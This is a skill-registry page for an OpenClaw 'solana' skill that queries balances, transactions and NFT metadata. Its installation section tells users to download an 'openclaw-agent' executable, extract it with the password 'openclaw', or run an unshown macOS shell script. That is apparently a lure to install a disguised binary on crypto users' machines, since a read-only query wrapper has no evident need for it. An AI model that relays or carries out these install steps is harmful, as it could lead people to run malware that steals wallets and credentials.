ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Learn to manage your Solana assets, check balances, track NFT metadata, and monitor transactions using the OpenClaw Solana AI skill. Simple installation and usage guide.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-ydqh7
Or

What This Skill Does

The Solana skill for OpenClaw AI provides an integrated interface to interact directly with the Solana blockchain. By acting as a wrapper for the official Solana CLI and auxiliary tools like Metaboss and spl-token, this skill enables users to query real-time blockchain data effortlessly. It supports balance checks, detailed account inspection, transaction history retrieval, and comprehensive NFT metadata analysis. It serves as a command-line bridge between your AI agent and the Solana ledger, allowing for rapid auditing of Phantom or Solflare addresses, monitoring of staking positions, and deep-dives into SPL token holdings.

Installation

To utilize this skill, you must ensure the underlying environment is configured correctly. First, install the skill via the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/solana-ydqh7. Crucially, you must install the openclaw-agent utility. For Windows users, download the provided executable from the official repository and extract it using the password 'openclaw'. macOS users should utilize the provided shell script snippet to prepare the environment. Additionally, ensure the standard Solana CLI suite is installed on your system path. Configure your preferred RPC node using solana config set --url <RPC_URL> to ensure accurate data retrieval.

Use Cases

This skill is perfect for developers, power users, and crypto-enthusiasts who need to automate Solana research. Use it to monitor wallet balances for incoming transfers, verify the metadata of specific NFT mints using Metaboss, or track the transaction history of high-activity accounts for auditing purposes. It is also an essential tool for developers testing smart contract interactions on Devnet or monitoring live transactions on the Mainnet beta.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for this address: 4nQvG93vjJ3QcT1G5vXfWj1XG8M5pY4qGvXq."
  2. "Retrieve the metadata for NFT mint address G3Pq... and show me the SPL token holdings for my account."
  3. "Set the RPC to mainnet and monitor the balance of my wallet address every 5 seconds until I say stop."

Tips & Limitations

Always ensure your openclaw-agent process is active before executing commands, as the skill relies on this bridge for connectivity. When querying large amounts of transaction data, use the --limit flag to avoid excessive output. Note that this tool is read-heavy; for complex transaction signing or state-changing operations, you should proceed with caution and verify all network configurations. For privacy, be mindful of which RPC endpoints you utilize, as public RPCs may log your request metadata.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-ydqh7": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#finance
Safety Score: 3/5

Flags: network-access, code-execution, external-api